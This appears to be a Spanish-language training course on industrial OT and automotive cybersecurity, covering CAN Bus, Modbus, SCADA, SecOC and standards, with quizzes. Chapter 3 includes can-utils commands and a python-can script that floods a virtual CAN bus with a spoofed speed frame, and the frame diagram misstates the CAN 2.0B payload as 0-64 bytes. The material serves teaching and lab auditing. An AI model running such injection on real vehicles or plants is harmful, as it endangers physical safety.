Industrial OT & Automotive Cybersecurity

CAN Bus · SCADA · Modbus/TCP · Automotive Hacking · SecOC · ISO/SAE 21434 · IEC 62443

Industrial OT & Automotive Cybersecurity Cover
Level 3 · Security Master Architect

Capítulo 1 · Ciberseguridad OT & Modelo Purdue Industrial

A diferencia de la tecnología de información tradicional (IT) enfocada en la Confidencialidad, la Tecnología de Operación (OT) prioriza la Disponibilidad y Seguridad Física (Safety). Un ciberataque en una planta química o sistema de frenado automotriz tiene consecuencias en el mundo físico.

¿Qué es el Modelo Purdue (PERA)?
El Modelo de Arquitectura de Referencia Purdue clasifica las redes industriales en 6 niveles jerárquicos (Nivel 0: Sensores/Actuadores hasta Nivel 5: Enterprise Nube), estableciendo fronteras de seguridad mediante DMZ Industriales.
┌─────────────────────────────────────────────────────────────────────────────┐ │ ARQUITECTURA MODELO PURDUE (PERA) │ │ │ │ [ Level 4 / 5 ] ERP, Enterprise IT Cloud Network │ │ │ │ │ ───────┼─────────────────── Industrial DMZ Firewall ────────────────────── │ │ │ │ │ [ Level 3 ] SCADA Control, Historian Servers, Fleet Telemetry │ │ │ │ │ [ Level 2 ] HMI Consoles, Control Room Systems │ │ │ │ │ [ Level 1 ] PLCs, PACs, Safety Instrumented Systems (SIS) │ │ │ │ │ [ Level 0 ] Physical Sensors, Motors, CAN Bus Field Devices │ └─────────────────────────────────────────────────────────────────────────────┘

Principales Casos de Amenazas Históricas en OT

  • Stuxnet (2010): El primer ciberarma cibernético diseñado para manipular PLCs Siemens S7-300 y destruir centrifugadoras físicas en Natanz.
  • Industroyer / CrashOverride (2016): Malware diseñado para subestaciones eléctricas utilizando protocolos ICS crudos (IEC 60870-5-104, IEC 61850).
  • Jeep Hack by Miller & Valasek (2015): Explotación remota a través del sistema de Infotenimiento conectándose al CAN Bus para deshabilitar frenos en carretera.
Cuestionario — Capítulo 1
1. En Ciberseguridad OT e Industrial, ¿cuál es la máxima prioridad del triada CIA?
En entornos OT, una interrupción en tiempo real puede causar catástrofes físicas o lesiones humanas. Por ello, la disponibilidad y la integridad operativa prevalecen sobre el cifrado de datos estáticos.

Capítulo 2 · Protocolo CAN Bus & Arquitectura In-Vehicle

El bus CAN (Controller Area Network) fue desarrollado por Bosch en 1986 y es el estándar de comunicación en todos los vehículos modernos y maquinaria pesada industrial.

Vulnerabilidad Nativa del Bus CAN: El protocolo CAN Bus no incluye ningún mecanismo nativo de autenticación, cifrado o dirección de origen/destino. Cualquier ECU conectada al bus puede leer todas las transmisiones y suplantar cualquier ID de mensaje (Spoofing).

Estructura Interna de un Frame CAN 2.0B (Standard & Extended)

┌───┬────────────────┬─────┬───────┬─────────────────────┬────────┬─────┬───┐ │SOF│ Arbitration ID │ RTR │ DLC │ Data Payload (0-8B) │ CRC │ ACK │EOF│ ├───┼────────────────┼─────┼───────┼─────────────────────┼────────┼─────┼───┤ │ 1 │ 11/29 bits │ 1 │ 4 bits│ 0 - 64 bytes │ 15 bits│ 2 │ 7 │ └───┴────────────────┴─────┴───────┴─────────────────────┴────────┴─────┴───┘
Campo Frame CANFunciónRelevancia en Ciberseguridad
Arbitration IDIdentificador del mensaje y prioridad (menor ID = mayor prioridad).Permite ataques Bus-Off DoS enviando paquetes con ID 0x000.
DLC (Data Length)Indica el número de bytes de datos (0 a 8 bytes en CAN 2.0).Se usa para validar estructuras de paquetes esperadas.
Data PayloadValores físicos de sensores (RPM, Ángulo de Dirección, Presión).Inyección de comandos maliciosos para modificar actuadores físicos.
Cuestionario — Capítulo 2
1. ¿Qué sucede cuando dos ECUs transmiten simultáneamente en un bus CAN?
En CAN Bus, los bits '0' son dominantes sobre los bits '1' recesivos. Por ello, el mensaje con menor ID (ej. 0x000 frente a 0x1A0) gana la arbitración sin perder tiempo de retransmisión.

Capítulo 3 · Automotive Hacking & Auditoría CLI (SocketCAN & Python)

Para auditar la seguridad de un vehículo o banco de pruebas industrial en Linux, utilizamos la interfaz de kernel **SocketCAN** y la suite **can-utils**.

bash (SocketCAN Setup & Sniffing)
# 1. Levantar interfaz CAN virtual (vcan0) para prácticas de auditoría
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

# 2. Iniciar sniffer de tráfico en tiempo real
candump -c -t a vcan0

# 3. Inyectar trama de prueba (ID: 0x1A0 | DLC: 4 | Data: DE AD BE EF)
cansend vcan0 1A0#DEADBEEF

Script en Python de Inyección y Fuzzing de ECUs

python (python-can Exploit Script)
import can
import time

# Conectar al bus CAN local
bus = can.interface.Bus(channel='vcan0', bustype='socketcan')

def inject_spoofed_speed(target_id=0x2B0):
    # Simular inyección de velocidad engañosa (180 km/h) a la pantalla del cluster
    data = [0x00, 0xB4, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x12]
    msg = can.Message(arbitration_id=target_id, data=data, is_extended_id=False)
    
    for _ in range(100):
        bus.send(msg)
        time.sleep(0.01) # Inyección de alta frecuencia a 100 Hz
    print("[+] Inyección de Spoofing completada exitosamente.")

inject_spoofed_speed()
Cuestionario — Capítulo 3
1. ¿Qué utilidad tiene la herramienta `cansniffer` durante una auditoría en automoción?
`cansniffer` es esencial para la ingeniería inversa de redes CAN. Al filtrar los paquetes estáticos y colorear los bytes variables, el auditor identifica qué ID controla el acelerador, los frenos o el cierre centralizado.

Capítulo 4 · Hardening de IIoT, Modbus/TCP & SCADA Defense

Los entornos de fabricación e Internet de las Cosas Industrial (IIoT) operan frecuentemente con protocolos heredados como **Modbus/TCP** sobre el puerto 502. Modbus carece de autenticación nativa, permitiendo a atacantes manipular registros de PLCs mediante comandos como `Write Single Register (Function Code 06)`.

Hardware Root of Trust
Integración de chips TPM 2.0 y Secure Elements en puertas de enlace IIoT para garantizar la autenticidad del firmware.
mTLS Autenticación
Cifrado de túneles MQTT/HTTPS utilizando Certificados X.509 de cliente y servidor en tiempo real.
DPI Industrial Firewalls
Inspección profunda de paquetes que bloquea códigos de función Modbus peligrosos a nivel de red física.
Cuestionario — Capítulo 4
1. ¿Cuál es el principal riesgo de seguridad en el protocolo Modbus/TCP estándar?
Modbus fue diseñado en 1979 para redes aisladas. Cualquier dispositivo en la red local puede enviar comandos de lectura y escritura a los registros de memoria de los sensores industriales.

Capítulo 5 · Estándares ISO/SAE 21434, IEC 62443 & AUTOSAR SecOC

Para cumplir con las regulaciones internacionales (UNECE R155 / R156), los fabricantes automotrices e industriales deben certificar sus arquitecturas mediante marcos de ciberseguridad estrictos.

AUTOSAR SecOC (Secure On-Board Communication)
Módulo que añade un Message Authentication Code (CMAC/HMAC) y un Contador de Frescura (Freshness Counter) a cada mensaje CAN. Esto previene ataques de suplantación y de repetición en tiempo real.
┌─────────────────────────────────────────────────────────────────────────────┐ │ ESTRUCTURA DE FRAME SECOC PROTEGIDO │ │ │ │ [ Authentic Payload (Data) ] + [ Freshness Counter ] ──► [ CMAC Engine ] │ │ │ │ │ ▼ │ │ [ CAN Frame: Original Data (4B) ] + [ Truncated Mac / SecOC (4B) ] │ └─────────────────────────────────────────────────────────────────────────────┘
Cuestionario — Capítulo 5
1. En AUTOSAR SecOC, ¿qué mecanismo evita que un atacante grabe un paquete legítimo y lo retransmita más tarde (Replay Attack)?
El Freshness Value se incrementa continuamente. Si el receptor detecta un contador repetido o antiguo, descarta el paquete de inmediato aunque la clave sea válida.

Capítulo 6 · Simulador Interactivo Live CAN Bus & Sistema IDS

Experimenta en tiempo real con la inyección de vectores de ataque en un bus CAN automotriz virtual y observa cómo el módulo **IDS (Intrusion Detection System)** mitiga los ciberataques.

Panel de Control de Inyección & Defensa
SISTEMA NORMAL
Velocidad (KM/H)
85
Estable
Motor RPM
2,400
Normal
CAN Bus Load
28%
Óptimo
Mitigación IDS
0
Inactivo
[00:00:01] vcan0 0x1A0 [8] 09 60 00 55 00 00 12 00 OK (Engine Telemetry)
Cuestionario Final — Capítulo 6
1. ¿Qué indicador en la consola evidencia un ataque de Denegación de Servicio (DoS) en la red CAN Bus?
Debido a la prioridad por arbitración, el ID 0x000 domina todos los ciclos de transmisión, impidiendo que el resto de las ECUs envíen telemetría legítima.
¡Curso Finalizado! Volver al Inicio